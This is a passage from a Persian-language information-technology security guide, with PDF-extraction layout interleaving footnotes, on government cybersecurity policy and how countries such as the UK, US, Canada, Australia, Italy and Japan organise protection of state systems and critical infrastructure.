.۱۰ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ﺭﺍ
ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ ،ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ ﺷـﺎﻣﻞ ﺗﺄﺳـﻴﺲ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻫﺸﺪﺍﺭﺩﻫﻨﺪﺓ ﺍﺿﻄﺮﺍﺭﻱ ،ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ﺑـﺮ
ﺍﺳﺎﺱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺧﺪﺍﺩﻫﺎ ،ﻭ ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﻣﻮﺭﺩ
ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻭ ﺍﻟﺒﺘﻪ ﺑـﺎ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻣﻲﺑﺎﺷﺪ.
.۱۱ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺧـﻮﺩ ﺭﺍ
ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ،
ﻣﺸﻮﻕ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺷﻨﺪ.
Data Availability
Council of Europe Cybercrime Convention
17
18
ﺧﺼﻮﺻﻴﺖ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺍﺧﻠـﻲ
ﻣﻴﺎﻥ ﺑﺨﺸﻬﺎ -ﺷﺎﻣﻞ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣـﺸﺎﺑﻪ ﻭ
ﻫﻤﺎﻧﻨﺪ -ﻭ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﺍﺭﺗﺒـﺎﻃﻲ ﻣـﺸﺘﺮﻙ ﺍﺳـﺖ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﻨـﺪ ﻛـﻪ ﺿـﺎﻣﻦ
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣـﺮﺗﺒﻂ
ﺑﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺯﻳﺮﺳﺎﺧﺘﻲ ﺑﺎﺷﻨﺪ .ﻣﻲﺗـﻮﺍﻥ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺎ ﺍﻧﺘﺨـﺎﺏ
ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻫﺒﺮﻱ ﺩﺭ ﺩﻭﻟﺖ ﺑـﺮﺍﻱ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ ﻣﺘﻤﺮﻛـﺰ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻋﻤﻠـﻲ ﻛـﺮﺩ ﻭ ﻣـﺎ ﻧﻴـﺰ ﺩﺭ
ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ.
٢٣٥
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺭﻭﺑﺮﻭ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺍﺑﺘـﺪﺍ ﺑـﻪ
ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﺎﺳﺦ ﺩﺍﺩ ﻛﻪ :ﺁﻳﺎ ﺍﺯ ﻧﻈﺮ ﺍﻗﺘﺼﺎﺩﻱ ،ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﻳﺎ
ﻣﻘﺮﺭﺍﺕ ﺣﺎﻛﻢ ،ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﻳـﻚ ﻣـﺴﺌﻠﻪ ﻗﺎﺑـﻞ ﺍﻫﻤﻴـﺖ
ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؟
ﻓﺼﻞ ﺩﻭﻡ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺑﺮﺍﻱ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺪ ﻧﻴﺴﺖ ﺑﺪﺍﻧﻴﻢ:
•
ﺩﺭ ﺑﺮﻳﺘﺎﻧﻴﺎ ،ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ ٢٢ﻛﻪ ﻣﺴﺌﻮﻝ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺖ
٢٣
ﺭﻫﺒﺮﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ.
•
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺭﺍ ﺩﺭ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﺩﺍﺧﻠـﻲ
ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ ،ﺍﻣﺎ ﺗﻌﻤﺪﹰﺍ ﻭ ﺑﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺑﺨـﺶ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ ٢٤ﺗﺤﺖ
٢٥
ﻧﻈﺎﺭﺕ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺗﺠﺎﺭﺕ ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﺮﺩﻩ ﺍﺳﺖ.
•
ﺍﺳﺘﺮﺍﻟﻴﺎ ﻳﻚ ﮔﺮﻭﻩ ﻫﻤﻜﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑـﺮﺍﻱ
ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺍﻳﺠـﺎﺩ ﻧﻤـﻮﺩﻩ -
Cyber-Security
۲۱
ﺗﻤﻬﻴﺪ ﺳﺎﺧﺘﺎﺭ ﻣﻠﻲ ﺑﺮﺍﻱ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻭﻟـﺖ ﺭﺍ ﺑـﺎ
ﭼﺎﻟﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﺟﻤﻠـﻪ ﭼﮕـﻮﻧﮕﻲ ﺭﻫﺒـﺮﻱ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ
E-Government
19
22
ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻳﻚ ﻣﺮﻛﺰ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻠـﻲ
) (NISCCﺗﺄﺳﻴﺲ ﻛﺮﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﺎﺋﻞ ﺣﻴﺎﺗﻲ ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻛﺎﺭ
ﻛﻨﺪ ،ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﻛﻤﻜـﻲ ﻻﺯﻡ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ ،ﻭ ﺭﻭﺍﺑـﻂ
ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺎﺩﻩﺗﺮ ﻧﻤﺎﻳﺪ.
ﺩﺭ NISCCﻳــﻚ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﻪ ﻧــﺎﻡ
UNIRASﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻫﻤﭽﻨﻴﻦ ﻳـﻚ ﺗـﻴﻢ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺣﻤـﻼﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ) (EARGﺩﺭ NISCCﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺣﺎﻭﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺑﺨﺸﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ ﺣﻤـﻼﺕ ﺁﺳـﻴﺐ
ﻣﻲﺑﻴﻨﻨﺪ ﻛﻤﻚ ﻛﻨﺪ UNIRAS .ﺑﻌﺪ ﺍﺯ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺣﻤﻼﺕ،
ﺑﻪ ﺗﻤﺎﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﻧﮕﻠـﺴﺘﺎﻥ ﻫـﺸﺪﺍﺭ ﻣـﻲﺩﻫـﺪ .ﺑـﺮﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﺩ ﺩﻭﻟﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ
ﻭﺏ NISCCﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.niscc.gov.uk
Computer Security Division of the National
Institute of Standards & Technology
۲۵
ﻓﺮﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺎﺯﻣﺎﻥ
ﺩﻓﺘﺮ "ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ ﺷـﺮﺍﻳﻂ ﺍﺿـﻄﺮﺍﺭﻱ"
ﻛﺎﻧﺎﺩﺍ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﺪﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻣﻠﻲ ﻓﻌﺎﻟﻴﺖ ﻣـﻲ-
ﻛﻨﺪ.
Home Office
۲۳
20
ﺍﺯ ﺑﻌﻀﻲ ﻣﻨﻈﺮﻫﺎ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺪﻝ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎ ﺩﺍﺭﺩ
ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻟﮕﻮﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﺒﺎﺷﺪ .ﺩﺭ
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ "ﻛﻤﻴﺘﻪ ﺍﻣﻨﻴﺖ ﻣﻠﻲ" ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ-
ﺍﻱ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺍﺳـﺖ ،ﺍﻣـﺎ ﻣﺮﻛـﺰ ﺩﻭﻟﺘـﻲ
ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺖ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻛـﺎﺥ ﺳـﻔﻴﺪ ﺩﺍﺩﻩ ،ﻭ
ﺷــﻮﺭﺍﻱ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﺩﺭ ﻛــﺎﺥ ﺳــﻔﻴﺪ ﻧﻴــﺰ ﻣــﺴﺌﻮﻟﻴﺖ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ.
24
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺗﻤﺎﻣﻲ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﺑـﺰﺭﮒ
)SMEﻫــﺎ( ﺩﺭ ﺑﺨــﺶ ﺳــﻮﻡ ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻳــﻢ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ
ﺷـــﺮﻛﺘﻬﺎ ﻧﻴﺎﺯﻣﻨـــﺪ ﻣﺤﺎﻓﻈـــﺖ ﺍﺯ ﺧـــﻮﺩ ،ﺗﻬﻴـــﻪﻛﻨﻨـــﺪﮔﺎﻥ ﻭ
ﻣــﺼﺮﻑﻛﻨﻨــﺪﮔﺎﻥ ﻫــﺴﺘﻨﺪ ،ﺩﻭﻟــﺖ ﻧﻴــﺰ ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ
ﺷﻬﺮﻭﻧﺪﺍﻥ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻣﻨﻴـﺖ
ﺳﺎﻳﺒﺮ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳـﺪ .ﺩﻭﻟﺘﻬـﺎﻱ ﻣﺤﻠـﻲ ﻭ ﻣﻠـﻲ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ
ﺟﻠﻮﻱ ﺑﺤﺮﺍﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻣﺜﻞ ﻭﻗﻮﻉ ﻭﻗﻔﻪ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ،
ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ
ﺑﮕﻴﺮﻧﺪ .ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﻋـﺚ
ﻛﺎﻫﺶ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻣﻲﺷﻮﺩ ﻭ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺎﻧﻌﻲ ﺑﺮﺍﻱ ﭘﻴـﺸﺮﻓﺖ
ﺍﻗﺪﺍﻣﺎﺕ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ١٩ﻣﻲﮔﺮﺩﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ
ﻻ ﺍﻭﻟـﻴﻦ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﻭﻟـﺖ ﺩﺭ
ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺍﺷﺎﺭﻩ ﺷﺪ ،ﻣﻌﻤـﻮ ﹰ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺎﻥ "ﺗﻨﻈﻴﻢ ﺍﻣـﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ" ﺁﻥ ﺍﺳـﺖ؛
ﺑﺪﻳﻦ ﻣﻌﻨـﺎ ﻛـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺳـﻄﻮﺡ )ﻣﻠـﻲ،
ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﻣﺤﻠـﻲ( ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ
ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺣﻔﺎﻇﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧﺪ .ﺍﻳﻨﻜﺎﺭ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﻳﺎ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﺍﺯ
ﺟﻤﻠﻪ ﻧﻴﺮﻭﻫـﺎﻱ ﻧﻈـﺎﻣﻲ ﻭ ﺍﻧﺘﻈـﺎﻣﻲ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻬﺪﺍﺷـﺖ ﻭ
ﺳﻼﻣﺖ ﻋﻤﻮﻣﻲ ،ﻣﺮﺍﻛـﺰ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﺍﺿـﻄﺮﺍﺭﻱ ،ﻭ ﻫﻤﭽﻨـﻴﻦ
ﺑﺎﻧﻜﻬﺎﻱ ﻣﺮﻛﺰﻱ ﻣﻲﺷﻮﺩ .ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺩﻭﻟـﺖ ﻛـﻪ
ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﻭﻟﺘـﻲ ﻭ ﭼـﻪ
ﭼﻴﺰﻱ ﺧﺼﻮﺻﻲ ﻣﺤﺴﻮﺏ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺁﺑﻲ ،ﺳﺪﻫﺎﻱ ﻫﻴـﺪﺭﻭﺍﻟﻜﺘﺮﻳﻜﻲ ،ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻨﺘـﺮﻝ ﺗﺮﺍﻓﻴـﻚ
ﻫﻮﺍﻳﻲ ﻭ ﺳﺎﻳﺮ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺑﺎﺷﻨﺪ.
•
ﻛﺎﻧﺎﺩﺍ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ٢٠ﺑـﻪ ﻭﺯﺍﺭﺕ
٢١
ﺩﻓﺎﻉ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٣٦
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺍﻗﺘـﺼﺎﺩ
ﺍﻃﻼﻋﺎﺗﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻭ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ
٢٦
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ.
•
ﺍﻳﺘﺎﻟﻴﺎ ﻳﻚ ﻛﻤﻴﺘﺔ ﺩﺍﺧﻠﻲ ﻭﺯﺍﺭﺗﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺴﺌﻮﻻﻧﻪ
ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻛﻪ ﺗﻮﺳﻂ ﺩﭘﺎﺭﺗﻤـﺎﻥ ﻧـﻮﺁﻭﺭﻱ ﻭ
ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻓﺘﺮ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻲﮔﺮﺩﺩ.
•
ﺩﺭ ﺳــﺎﻝ ۲۰۰۰ﻧﺨــﺴﺖ ﻭﺯﻳــﺮ ﮊﺍﭘــﻦ ﮔﺮﻭﻫــﻲ ﺭﺍ ﺑــﺮﺍﻱ
ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛﺎﺑﻴﻨـﺔ
ﺩﻭﻟﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﺗﺎ ﺑﻬﺘـﺮ ﺑﺘﻮﺍﻧـﺪ ﻣﻌﻴﺎﺭﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻴﺎﻥ ﻭﺯﻳﺮﺍﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﻤﺎﻫﻨﮓ ﻧﻤﺎﻳﺪ .ﺍﻳـﻦ
ﮔﺮﻭﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﻋـﻀﻮ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ
٢٧
ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻭﺍﺑﺴﺘﻪ ﻭ ﻧﻴﺰ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻧﺪ.
ﺍﻧﺘﺨﺎﺏ ﻣﺤﻞ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺩﻭﻟـﺖ ﺍﻫﻤﻴـﺖ
ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺯﻣـﺎﻥ ﺍﻧﺘـﺸﺎﺭ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ،
ﻧﻴﺎﺯﻣﻨﺪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺍﺳﺖ .ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ
ﻻ ﻣﺴﺌﻮﻝ ﺣﻔﻆ ﺍﺳﺮﺍﺭ ﺍﻣﻨﻴﺖ ﻣﻠـﻲ ﺍﺳـﺖ
ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ
ﻣﻄﺎﻟﺐ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻨﺘـﺸﺮ
ﻧﺸﻮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﺁﻧﭽﻪ ﻛـﻪ ﻣﻌﺘﻘـﺪﻳﻢ ﻣـﺆﺛﺮﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ
